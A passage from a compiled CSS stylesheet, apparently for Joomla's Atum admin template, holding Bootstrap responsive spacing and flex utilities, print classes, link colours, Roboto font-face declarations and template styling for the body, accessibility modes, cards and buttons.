    margin-top: 3rem !important;
    margin-bottom: 3rem !important;
  }

  .my-xl-auto {
    margin-top: auto !important;
    margin-bottom: auto !important;
  }

  .mt-xl-0 {
    margin-top: 0 !important;
  }

  .mt-xl-1 {
    margin-top: 0.25rem !important;
  }

  .mt-xl-2 {
    margin-top: 0.5rem !important;
  }

  .mt-xl-3 {
    margin-top: 1rem !important;
  }

  .mt-xl-4 {
    margin-top: 1.5rem !important;
  }

  .mt-xl-5 {
    margin-top: 3rem !important;
  }

  .mt-xl-auto {
    margin-top: auto !important;
  }

  .me-xl-0 {
    margin-right: 0 !important;
  }

  .me-xl-1 {
    margin-right: 0.25rem !important;
  }

  .me-xl-2 {
    margin-right: 0.5rem !important;
  }

  .me-xl-3 {
    margin-right: 1rem !important;
  }

  .me-xl-4 {
    margin-right: 1.5rem !important;
  }

  .me-xl-5 {
    margin-right: 3rem !important;
  }

  .me-xl-auto {
    margin-right: auto !important;
  }

  .mb-xl-0 {
    margin-bottom: 0 !important;
  }

  .mb-xl-1 {
    margin-bottom: 0.25rem !important;
  }

  .mb-xl-2 {
    margin-bottom: 0.5rem !important;
  }

  .mb-xl-3 {
    margin-bottom: 1rem !important;
  }

  .mb-xl-4 {
    margin-bottom: 1.5rem !important;
  }

  .mb-xl-5 {
    margin-bottom: 3rem !important;
  }

  .mb-xl-auto {
    margin-bottom: auto !important;
  }

  .ms-xl-0 {
    margin-left: 0 !important;
  }

  .ms-xl-1 {
    margin-left: 0.25rem !important;
  }

  .ms-xl-2 {
    margin-left: 0.5rem !important;
  }

  .ms-xl-3 {
    margin-left: 1rem !important;
  }

  .ms-xl-4 {
    margin-left: 1.5rem !important;
  }

  .ms-xl-5 {
    margin-left: 3rem !important;
  }

  .ms-xl-auto {
    margin-left: auto !important;
  }

  .p-xl-0 {
    padding: 0 !important;
  }

  .p-xl-1 {
    padding: 0.25rem !important;
  }

  .p-xl-2 {
    padding: 0.5rem !important;
  }

  .p-xl-3 {
    padding: 1rem !important;
  }

  .p-xl-4 {
    padding: 1.5rem !important;
  }

  .p-xl-5 {
    padding: 3rem !important;
  }

  .px-xl-0 {
    padding-right: 0 !important;
    padding-left: 0 !important;
  }

  .px-xl-1 {
    padding-right: 0.25rem !important;
    padding-left: 0.25rem !important;
  }

  .px-xl-2 {
    padding-right: 0.5rem !important;
    padding-left: 0.5rem !important;
  }

  .px-xl-3 {
    padding-right: 1rem !important;
    padding-left: 1rem !important;
  }

  .px-xl-4 {
    padding-right: 1.5rem !important;
    padding-left: 1.5rem !important;
  }

  .px-xl-5 {
    padding-right: 3rem !important;
    padding-left: 3rem !important;
  }

  .py-xl-0 {
    padding-top: 0 !important;
    padding-bottom: 0 !important;
  }

  .py-xl-1 {
    padding-top: 0.25rem !important;
    padding-bottom: 0.25rem !important;
  }

  .py-xl-2 {
    padding-top: 0.5rem !important;
    padding-bottom: 0.5rem !important;
  }

  .py-xl-3 {
    padding-top: 1rem !important;
    padding-bottom: 1rem !important;
  }

  .py-xl-4 {
    padding-top: 1.5rem !important;
    padding-bottom: 1.5rem !important;
  }

  .py-xl-5 {
    padding-top: 3rem !important;
    padding-bottom: 3rem !important;
  }

  .pt-xl-0 {
    padding-top: 0 !important;
  }

  .pt-xl-1 {
    padding-top: 0.25rem !important;
  }

  .pt-xl-2 {
    padding-top: 0.5rem !important;
  }

  .pt-xl-3 {
    padding-top: 1rem !important;
  }

  .pt-xl-4 {
    padding-top: 1.5rem !important;
  }

  .pt-xl-5 {
    padding-top: 3rem !important;
  }

  .pe-xl-0 {
    padding-right: 0 !important;
  }

  .pe-xl-1 {
    padding-right: 0.25rem !important;
  }

  .pe-xl-2 {
    padding-right: 0.5rem !important;
  }

  .pe-xl-3 {
    padding-right: 1rem !important;
  }

  .pe-xl-4 {
    padding-right: 1.5rem !important;
  }

  .pe-xl-5 {
    padding-right: 3rem !important;
  }

  .pb-xl-0 {
    padding-bottom: 0 !important;
  }

  .pb-xl-1 {
    padding-bottom: 0.25rem !important;
  }

  .pb-xl-2 {
    padding-bottom: 0.5rem !important;
  }

  .pb-xl-3 {
    padding-bottom: 1rem !important;
  }

  .pb-xl-4 {
    padding-bottom: 1.5rem !important;
  }

  .pb-xl-5 {
    padding-bottom: 3rem !important;
  }

  .ps-xl-0 {
    padding-left: 0 !important;
  }

  .ps-xl-1 {
    padding-left: 0.25rem !important;
  }

  .ps-xl-2 {
    padding-left: 0.5rem !important;
  }

  .ps-xl-3 {
    padding-left: 1rem !important;
  }

  .ps-xl-4 {
    padding-left: 1.5rem !important;
  }

  .ps-xl-5 {
    padding-left: 3rem !important;
  }

  .text-xl-start {
    text-align: left !important;
  }

  .text-xl-end {
    text-align: right !important;
  }

  .text-xl-center {
    text-align: center !important;
  }
}
@media (min-width: 1400px) {
  .float-xxl-start {
    float: left !important;
  }

  .float-xxl-end {
    float: right !important;
  }

  .float-xxl-none {
    float: none !important;
  }

  .d-xxl-inline {
    display: inline !important;
  }

  .d-xxl-inline-block {
    display: inline-block !important;
  }

  .d-xxl-block {
    display: block !important;
  }

  .d-xxl-grid {
    display: grid !important;
  }

  .d-xxl-table {
    display: table !important;
  }

  .d-xxl-table-row {
    display: table-row !important;
  }

  .d-xxl-table-cell {
    display: table-cell !important;
  }

  .d-xxl-flex {
    display: flex !important;
  }

  .d-xxl-inline-flex {
    display: inline-flex !important;
  }

  .d-xxl-none {
    display: none !important;
  }

  .flex-xxl-fill {
    flex: 1 1 auto !important;
  }

  .flex-xxl-row {
    flex-direction: row !important;
  }

  .flex-xxl-column {
    flex-direction: column !important;
  }

  .flex-xxl-row-reverse {
    flex-direction: row-reverse !important;
  }

  .flex-xxl-column-reverse {
    flex-direction: column-reverse !important;
  }

  .flex-xxl-grow-0 {
    flex-grow: 0 !important;
  }

  .flex-xxl-grow-1 {
    flex-grow: 1 !important;
  }

  .flex-xxl-shrink-0 {
    flex-shrink: 0 !important;
  }

  .flex-xxl-shrink-1 {
    flex-shrink: 1 !important;
  }

  .flex-xxl-wrap {
    flex-wrap: wrap !important;
  }

  .flex-xxl-nowrap {
    flex-wrap: nowrap !important;
  }

  .flex-xxl-wrap-reverse {
    flex-wrap: wrap-reverse !important;
  }

  .gap-xxl-0 {
    gap: 0 !important;
  }

  .gap-xxl-1 {
    gap: 0.25rem !important;
  }

  .gap-xxl-2 {
    gap: 0.5rem !important;
  }

  .gap-xxl-3 {
    gap: 1rem !important;
  }

  .gap-xxl-4 {
    gap: 1.5rem !important;
  }

  .gap-xxl-5 {
    gap: 3rem !important;
  }

  .justify-content-xxl-start {
    justify-content: flex-start !important;
  }

  .justify-content-xxl-end {
    justify-content: flex-end !important;
  }

  .justify-content-xxl-center {
    justify-content: center !important;
  }

  .justify-content-xxl-between {
    justify-content: space-between !important;
  }

  .justify-content-xxl-around {
    justify-content: space-around !important;
  }

  .justify-content-xxl-evenly {
    justify-content: space-evenly !important;
  }

  .align-items-xxl-start {
    align-items: flex-start !important;
  }

  .align-items-xxl-end {
    align-items: flex-end !important;
  }

  .align-items-xxl-center {
    align-items: center !important;
  }

  .align-items-xxl-baseline {
    align-items: baseline !important;
  }

  .align-items-xxl-stretch {
    align-items: stretch !important;
  }

  .align-content-xxl-start {
    align-content: flex-start !important;
  }

  .align-content-xxl-end {
    align-content: flex-end !important;
  }

  .align-content-xxl-center {
    align-content: center !important;
  }

  .align-content-xxl-between {
    align-content: space-between !important;
  }

  .align-content-xxl-around {
    align-content: space-around !important;
  }

  .align-content-xxl-stretch {
    align-content: stretch !important;
  }

  .align-self-xxl-auto {
    align-self: auto !important;
  }

  .align-self-xxl-start {
    align-self: flex-start !important;
  }

  .align-self-xxl-end {
    align-self: flex-end !important;
  }

  .align-self-xxl-center {
    align-self: center !important;
  }

  .align-self-xxl-baseline {
    align-self: baseline !important;
  }

  .align-self-xxl-stretch {
    align-self: stretch !important;
  }

  .order-xxl-first {
    order: -1 !important;
  }

  .order-xxl-0 {
    order: 0 !important;
  }

  .order-xxl-1 {
    order: 1 !important;
  }

  .order-xxl-2 {
    order: 2 !important;
  }

  .order-xxl-3 {
    order: 3 !important;
  }

  .order-xxl-4 {
    order: 4 !important;
  }

  .order-xxl-5 {
    order: 5 !important;
  }

  .order-xxl-last {
    order: 6 !important;
  }

  .m-xxl-0 {
    margin: 0 !important;
  }

  .m-xxl-1 {
    margin: 0.25rem !important;
  }

  .m-xxl-2 {
    margin: 0.5rem !important;
  }

  .m-xxl-3 {
    margin: 1rem !important;
  }

  .m-xxl-4 {
    margin: 1.5rem !important;
  }

  .m-xxl-5 {
    margin: 3rem !important;
  }

  .m-xxl-auto {
    margin: auto !important;
  }

  .mx-xxl-0 {
    margin-right: 0 !important;
    margin-left: 0 !important;
  }

  .mx-xxl-1 {
    margin-right: 0.25rem !important;
    margin-left: 0.25rem !important;
  }

  .mx-xxl-2 {
    margin-right: 0.5rem !important;
    margin-left: 0.5rem !important;
  }

  .mx-xxl-3 {
    margin-right: 1rem !important;
    margin-left: 1rem !important;
  }

  .mx-xxl-4 {
    margin-right: 1.5rem !important;
    margin-left: 1.5rem !important;
  }

  .mx-xxl-5 {
    margin-right: 3rem !important;
    margin-left: 3rem !important;
  }

  .mx-xxl-auto {
    margin-right: auto !important;
    margin-left: auto !important;
  }

  .my-xxl-0 {
    margin-top: 0 !important;
    margin-bottom: 0 !important;
  }

  .my-xxl-1 {
    margin-top: 0.25rem !important;
    margin-bottom: 0.25rem !important;
  }

  .my-xxl-2 {
    margin-top: 0.5rem !important;
    margin-bottom: 0.5rem !important;
  }

  .my-xxl-3 {
    margin-top: 1rem !important;
    margin-bottom: 1rem !important;
  }

  .my-xxl-4 {
    margin-top: 1.5rem !important;
    margin-bottom: 1.5rem !important;
  }

  .my-xxl-5 {
    margin-top: 3rem !important;
    margin-bottom: 3rem !important;
  }

  .my-xxl-auto {
    margin-top: auto !important;
    margin-bottom: auto !important;
  }

  .mt-xxl-0 {
    margin-top: 0 !important;
  }

  .mt-xxl-1 {
    margin-top: 0.25rem !important;
  }

  .mt-xxl-2 {
    margin-top: 0.5rem !important;
  }

  .mt-xxl-3 {
    margin-top: 1rem !important;
  }

  .mt-xxl-4 {
    margin-top: 1.5rem !important;
  }

  .mt-xxl-5 {
    margin-top: 3rem !important;
  }

  .mt-xxl-auto {
    margin-top: auto !important;
  }

  .me-xxl-0 {
    margin-right: 0 !important;
  }

  .me-xxl-1 {
    margin-right: 0.25rem !important;
  }

  .me-xxl-2 {
    margin-right: 0.5rem !important;
  }

  .me-xxl-3 {
    margin-right: 1rem !important;
  }

  .me-xxl-4 {
    margin-right: 1.5rem !important;
  }

  .me-xxl-5 {
    margin-right: 3rem !important;
  }

  .me-xxl-auto {
    margin-right: auto !important;
  }

  .mb-xxl-0 {
    margin-bottom: 0 !important;
  }

  .mb-xxl-1 {
    margin-bottom: 0.25rem !important;
  }

  .mb-xxl-2 {
    margin-bottom: 0.5rem !important;
  }

  .mb-xxl-3 {
    margin-bottom: 1rem !important;
  }

  .mb-xxl-4 {
    margin-bottom: 1.5rem !important;
  }

  .mb-xxl-5 {
    margin-bottom: 3rem !important;
  }

  .mb-xxl-auto {
    margin-bottom: auto !important;
  }

  .ms-xxl-0 {
    margin-left: 0 !important;
  }

  .ms-xxl-1 {
    margin-left: 0.25rem !important;
  }

  .ms-xxl-2 {
    margin-left: 0.5rem !important;
  }

  .ms-xxl-3 {
    margin-left: 1rem !important;
  }

  .ms-xxl-4 {
    margin-left: 1.5rem !important;
  }

  .ms-xxl-5 {
    margin-left: 3rem !important;
  }

  .ms-xxl-auto {
    margin-left: auto !important;
  }

  .p-xxl-0 {
    padding: 0 !important;
  }

  .p-xxl-1 {
    padding: 0.25rem !important;
  }

  .p-xxl-2 {
    padding: 0.5rem !important;
  }

  .p-xxl-3 {
    padding: 1rem !important;
  }

  .p-xxl-4 {
    padding: 1.5rem !important;
  }

  .p-xxl-5 {
    padding: 3rem !important;
  }

  .px-xxl-0 {
    padding-right: 0 !important;
    padding-left: 0 !important;
  }

  .px-xxl-1 {
    padding-right: 0.25rem !important;
    padding-left: 0.25rem !important;
  }

  .px-xxl-2 {
    padding-right: 0.5rem !important;
    padding-left: 0.5rem !important;
  }

  .px-xxl-3 {
    padding-right: 1rem !important;
    padding-left: 1rem !important;
  }

  .px-xxl-4 {
    padding-right: 1.5rem !important;
    padding-left: 1.5rem !important;
  }

  .px-xxl-5 {
    padding-right: 3rem !important;
    padding-left: 3rem !important;
  }

  .py-xxl-0 {
    padding-top: 0 !important;
    padding-bottom: 0 !important;
  }

  .py-xxl-1 {
    padding-top: 0.25rem !important;
    padding-bottom: 0.25rem !important;
  }

  .py-xxl-2 {
    padding-top: 0.5rem !important;
    padding-bottom: 0.5rem !important;
  }

  .py-xxl-3 {
    padding-top: 1rem !important;
    padding-bottom: 1rem !important;
  }

  .py-xxl-4 {
    padding-top: 1.5rem !important;
    padding-bottom: 1.5rem !important;
  }

  .py-xxl-5 {
    padding-top: 3rem !important;
    padding-bottom: 3rem !important;
  }

  .pt-xxl-0 {
    padding-top: 0 !important;
  }

  .pt-xxl-1 {
    padding-top: 0.25rem !important;
  }

  .pt-xxl-2 {
    padding-top: 0.5rem !important;
  }

  .pt-xxl-3 {
    padding-top: 1rem !important;
  }

  .pt-xxl-4 {
    padding-top: 1.5rem !important;
  }

  .pt-xxl-5 {
    padding-top: 3rem !important;
  }

  .pe-xxl-0 {
    padding-right: 0 !important;
  }

  .pe-xxl-1 {
    padding-right: 0.25rem !important;
  }

  .pe-xxl-2 {
    padding-right: 0.5rem !important;
  }

  .pe-xxl-3 {
    padding-right: 1rem !important;
  }

  .pe-xxl-4 {
    padding-right: 1.5rem !important;
  }

  .pe-xxl-5 {
    padding-right: 3rem !important;
  }

  .pb-xxl-0 {
    padding-bottom: 0 !important;
  }

  .pb-xxl-1 {
    padding-bottom: 0.25rem !important;
  }

  .pb-xxl-2 {
    padding-bottom: 0.5rem !important;
  }

  .pb-xxl-3 {
    padding-bottom: 1rem !important;
  }

  .pb-xxl-4 {
    padding-bottom: 1.5rem !important;
  }

  .pb-xxl-5 {
    padding-bottom: 3rem !important;
  }

  .ps-xxl-0 {
    padding-left: 0 !important;
  }

  .ps-xxl-1 {
    padding-left: 0.25rem !important;
  }

  .ps-xxl-2 {
    padding-left: 0.5rem !important;
  }

  .ps-xxl-3 {
    padding-left: 1rem !important;
  }

  .ps-xxl-4 {
    padding-left: 1.5rem !important;
  }

  .ps-xxl-5 {
    padding-left: 3rem !important;
  }

  .text-xxl-start {
    text-align: left !important;
  }

  .text-xxl-end {
    text-align: right !important;
  }

  .text-xxl-center {
    text-align: center !important;
  }
}
@media (min-width: 1200px) {
  .fs-1 {
    font-size: 1.65rem !important;
  }

  .fs-2 {
    font-size: 1.5rem !important;
  }
}
@media print {
  .d-print-inline {
    display: inline !important;
  }

  .d-print-inline-block {
    display: inline-block !important;
  }

  .d-print-block {
    display: block !important;
  }

  .d-print-grid {
    display: grid !important;
  }

  .d-print-table {
    display: table !important;
  }

  .d-print-table-row {
    display: table-row !important;
  }

  .d-print-table-cell {
    display: table-cell !important;
  }

  .d-print-flex {
    display: flex !important;
  }

  .d-print-inline-flex {
    display: inline-flex !important;
  }

  .d-print-none {
    display: none !important;
  }
}
.clearfix::after {
  display: block;
  clear: both;
  content: "";
}

.link-primary {
  color: #132f53;
}
.link-primary:hover, .link-primary:focus {
  color: #0f2642;
}

.link-secondary {
  color: #495057;
}
.link-secondary:hover, .link-secondary:focus {
  color: #3a4046;
}

.link-success {
  color: #457d54;
}
.link-success:hover, .link-success:focus {
  color: #376443;
}

.link-info {
  color: #2a69b8;
}
.link-info:hover, .link-info:focus {
  color: #225493;
}

.link-warning {
  color: #ffb514;
}
.link-warning:hover, .link-warning:focus {
  color: #ffc443;
}

.link-danger {
  color: #c52827;
}
.link-danger:hover, .link-danger:focus {
  color: #9e201f;
}

.link-light {
  color: #f8f9fa;
}
.link-light:hover, .link-light:focus {
  color: #f9fafb;
}

.link-dark {
  color: #212529;
}
.link-dark:hover, .link-dark:focus {
  color: #1a1e21;
}

.link-atum-link-color {
  color: #2a69b8;
}
.link-atum-link-color:hover, .link-atum-link-color:focus {
  color: #225493;
}

.link-atum-text-dark {
  color: #495057;
}
.link-atum-text-dark:hover, .link-atum-text-dark:focus {
  color: #3a4046;
}

.link-action {
  color: #132f53;
}
.link-action:hover, .link-action:focus {
  color: #0f2642;
}

.link-error {
  color: #3b0d0c;
}
.link-error:hover, .link-error:focus {
  color: #2f0a0a;
}

.link-alert-success {
  color: #0f2f21;
}
.link-alert-success:hover, .link-alert-success:focus {
  color: #0c261a;
}

.ratio {
  position: relative;
  width: 100%;
}
.ratio::before {
  display: block;
  padding-top: var(--aspect-ratio);
  content: "";
}
.ratio > * {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}

.ratio-1x1 {
  --aspect-ratio: 100%;
}

.ratio-4x3 {
  --aspect-ratio: calc(3 / 4 * 100%);
}

.ratio-16x9 {
  --aspect-ratio: calc(9 / 16 * 100%);
}

.ratio-21x9 {
  --aspect-ratio: calc(9 / 21 * 100%);
}

.fixed-top {
  position: fixed;
  top: 0;
  right: 0;
  left: 0;
  z-index: 1030;
}

.fixed-bottom {
  position: fixed;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1030;
}

.sticky-top {
  position: sticky;
  top: 0;
  z-index: 1020;
}

@media (min-width: 576px) {
  .sticky-sm-top {
    position: sticky;
    top: 0;
    z-index: 1020;
  }
}
@media (min-width: 768px) {
  .sticky-md-top {
    position: sticky;
    top: 0;
    z-index: 1020;
  }
}
@media (min-width: 992px) {
  .sticky-lg-top {
    position: sticky;
    top: 0;
    z-index: 1020;
  }
}
@media (min-width: 1200px) {
  .sticky-xl-top {
    position: sticky;
    top: 0;
    z-index: 1020;
  }
}
@media (min-width: 1400px) {
  .sticky-xxl-top {
    position: sticky;
    top: 0;
    z-index: 1020;
  }
}
.visually-hidden, .sr-only,
.visually-hidden-focusable:not(:focus):not(:focus-within) {
  position: absolute !important;
  width: 1px !important;
  height: 1px !important;
  padding: 0 !important;
  margin: -1px !important;
  overflow: hidden !important;
  clip: rect(0, 0, 0, 0) !important;
  white-space: nowrap !important;
  border: 0 !important;
}

.stretched-link::after {
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1;
  content: "";
}

.text-truncate {
  overflow: hidden;
  text-overflow: ellipsis;
  white-space: nowrap;
}

@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Regular.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Regular.woff") format("woff");
  font-weight: 400;
  font-style: normal;
}
@font-face {
  font-family: "Roboto-Regular";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Regular.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Regular.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-RegularItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-RegularItalic.woff") format("woff");
  font-weight: 400;
  font-style: italic;
}
@font-face {
  font-family: "Roboto-RegularItalic";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-RegularItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-RegularItalic.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Light.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Light.woff") format("woff");
  font-weight: 300;
  font-style: normal;
}
@font-face {
  font-family: "Roboto-Light";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Light.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Light.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-LightItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-LightItalic.woff") format("woff");
  font-weight: 300;
  font-style: italic;
}
@font-face {
  font-family: "Roboto-LightItalic";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-LightItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-LightItalic.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Thin.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Thin.woff") format("woff");
  font-weight: 100;
  font-style: normal;
}
@font-face {
  font-family: "Roboto-Thin";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Thin.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Thin.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-ThinItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-ThinItalic.woff") format("woff");
  font-weight: 100;
  font-style: italic;
}
@font-face {
  font-family: "Roboto-ThinItalic";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-ThinItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-ThinItalic.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Medium.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Medium.woff") format("woff");
  font-weight: 500;
  font-style: normal;
}
@font-face {
  font-family: "Roboto-Medium";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Medium.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Medium.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-MediumItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-MediumItalic.woff") format("woff");
  font-weight: 500;
  font-style: italic;
}
@font-face {
  font-family: "Roboto-MediumItalic";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-MediumItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-MediumItalic.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Bold.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Bold.woff") format("woff");
  font-weight: 700;
  font-style: normal;
}
@font-face {
  font-family: "Roboto-Bold";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Bold.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Bold.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BoldItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BoldItalic.woff") format("woff");
  font-weight: 700;
  font-style: italic;
}
@font-face {
  font-family: "Roboto-BoldItalic";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BoldItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BoldItalic.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Black.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Black.woff") format("woff");
  font-weight: 900;
  font-style: normal;
}
@font-face {
  font-family: "Roboto-Black";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Black.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-Black.woff") format("woff");
}
@font-face {
  font-family: "Roboto";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BlackItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BlackItalic.woff") format("woff");
  font-weight: 900;
  font-style: italic;
}
@font-face {
  font-family: "Roboto-BlackItalic";
  src: url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BlackItalic.woff2") format("woff2"), url("../../../../media/vendor/roboto-fontface/fonts/roboto/Roboto-BlackItalic.woff") format("woff");
}
html {
  height: 100%;
}
html.a11y_font {
  font-size: 18px;
}

body {
  display: flex;
  flex-direction: column;
  min-height: 100%;
  padding: 0;
  margin: 0;
  text-align: start;
}
body.admin {
  background-color: var(--template-bg-dark-5);
}
body.monochrome {
  -webkit-filter: grayscale(1);
          filter: grayscale(1);
}
body.monochrome::after {
  position: fixed;
  top: 0;
  left: 0;
  z-index: -1;
  width: 100%;
  height: 100%;
  content: "";
  background: var(--template-bg-dark-5);
}
body.a11y_contrast {
  -webkit-filter: contrast(115%);
          filter: contrast(115%);
}
body.monochrome.a11y_contrast {
  -webkit-filter: grayscale(1) contrast(115%);
          filter: grayscale(1) contrast(115%);
}
body.a11y_highlight a,
body.a11y_highlight .header-item-content {
  padding: 3px;
  text-decoration: underline !important;
  border: #f00 dotted 1px;
}
body.a11y_highlight .joomlaversion {
  padding: 0;
  text-decoration: none !important;
  border: none;
}
body.a11y_highlight a.page-link {
  padding: 0.375rem 0.75rem;
}

h1, .h1,
h2,
.h2,
h3,
.h3,
h4,
.h4,
h5,
.h5,
h6,
.h6 {
  font-weight: 700;
}

h1, .h1 {
  font-weight: 400;
}

small,
.small {
  font-size: 0.8rem;
}

legend {
  font-size: 1.2rem;
  font-weight: 700;
}

.js-focus-visible :focus:not(.focus-visible) {
  outline: none;
}

a.focus-visible,
button.focus-visible,
input.focus-visible,
textarea.focus-visible {
  outline: auto 2px var(--focus);
}

.break-word {
  word-break: break-all;
  word-wrap: break-word;
}

label,
caption {
  font-size: 1rem;
  text-align: start;
}

.logo img path {
  fill: var(--template-text-dark);
}

.container-main,
.system-debug {
  padding-bottom: 50px;
}

body .container-main {
  order: 1;
  position: relative;
  padding-right: 0;
  padding-left: 0;
}

.content {
  padding: 1rem;
}
@media (min-width: 768px) {
  .content {
    padding: 0 2rem;
  }
  .subhead + .content {
    padding-top: 0;
  }
}

body:not(.contentpane) .main-card {
  background: #fff;
  border-radius: 0.25rem;
  box-shadow: 0 2px 10px -8px var(--template-bg-dark-50);
}

.row-selected {
  background-color: var(--toolbar-bg);
}

.chzn-container-single {
  width: auto !important;
}

.input-group input {
  min-width: 220px;
}

.item-associations {
  padding: 0;
}

.item-associations li {
  display: inline-block;
  margin-bottom: 3px;
  list-style: none;
}

.message-alert {
  text-align: end !important;
}

a[target=_blank]::before {
  -webkit-padding-end: 3px;
          padding-inline-end: 3px;
  font-family: "Font Awesome 5 Free";
  font-size: 14px;
  font-weight: 900;
  content: "";
}

@media (max-width: 575.98px) {
  #wrapper.d-flex {
    display: block !important;
  }
}

.text-muted {
  color: var(--template-text-dark) !important;
  opacity: 0.7;
}

.card-columns {
  display: grid;
  grid-gap: 0 15px;
  grid-template-columns: 1fr;
}
@media (min-width: 768px) {
  .card-columns {
    grid-template-columns: 1fr 1fr;
  }
}

@media (min-width: 768px) {
  .cpanel-help .card-columns,
.cpanel-system .card-columns {
    grid-template-columns: 1fr 1fr 1fr;
  }
}

.tiny {
  font-size: 0.6rem;
  line-height: 1.4rem;
}

details {
  padding: 0.5rem 1rem;
  margin: 0 0 2rem;
  background: var(--template-bg-dark-3);
  border: 1px solid var(--template-bg-dark-10);
  border-radius: 0.25rem;
}
details summary {
  color: var(--template-link-color);
}
details summary ~ * {
  margin-top: 1rem;
}

meter {
  width: 100%;
}

@media (min-width: 768px) {
  joomla-tab[orientation=horizontal]:not([view=accordion]) section > .row {
    --gutter-x: 4rem;
  }
  joomla-tab[orientation=horizontal]:not([view=accordion]) section > .row > * + * {
    -webkit-border-start: 1px solid var(--template-bg-dark-10);
            border-inline-start: 1px solid var(--template-bg-dark-10);
  }
}
.minicolors-theme-bootstrap .minicolors-swatch {
  width: 36px;
  height: 36px;
}
.minicolors-theme-bootstrap .minicolors-swatch > .minicolors-sprite {
  top: 50%;
  left: 8px;
  border-radius: 0;
  -webkit-transform: translateY(-50%);
          transform: translateY(-50%);
}

span.minicolors-swatch-color {
  cursor: pointer;
}

@media (max-width: 767.98px) {
  .badge {
    white-space: normal;
  }
}
.badge.bg-secondary:hover {
  color: #fff;
}

.btn {
  transition: none;
}

@media (max-width: 575.98px) {
  .btn {
    margin-bottom: 0.25rem;
  }

  .input-group .btn {
    margin-bottom: 0;
  }
}
.btn-primary {
  color: var(--template-text-light);
  background-color: var(--template-bg-dark-60);
  border-color: var(--template-bg-dark-60);
}
.btn-primary:hover, .btn-primary:focus, .btn-primary:active {
  background-color: var(--template-bg-dark-70);
  border-color: var(--template-bg-dark-90);
}
.btn-primary:not(:disabled):not(.disabled):active, .btn-primary:not(:disabled):not(.disabled).active, .show > .btn-primary.dropdown-toggle {
  background-color: var(--template-bg-dark);
  border-color: var(--template-bg-dark);
}

.btn-secondary {
  background-color: var(--template-bg-dark-60);
  border-color: var(--template-bg-dark-60);
}

.input-group-text {
  background-color: var(--template-bg-dark);
  border-color: var(--template-bg-dark);
}

.card-columns .card {
  margin-bottom: 1rem;
}
@media (min-width: 576px) {
  .card-columns {
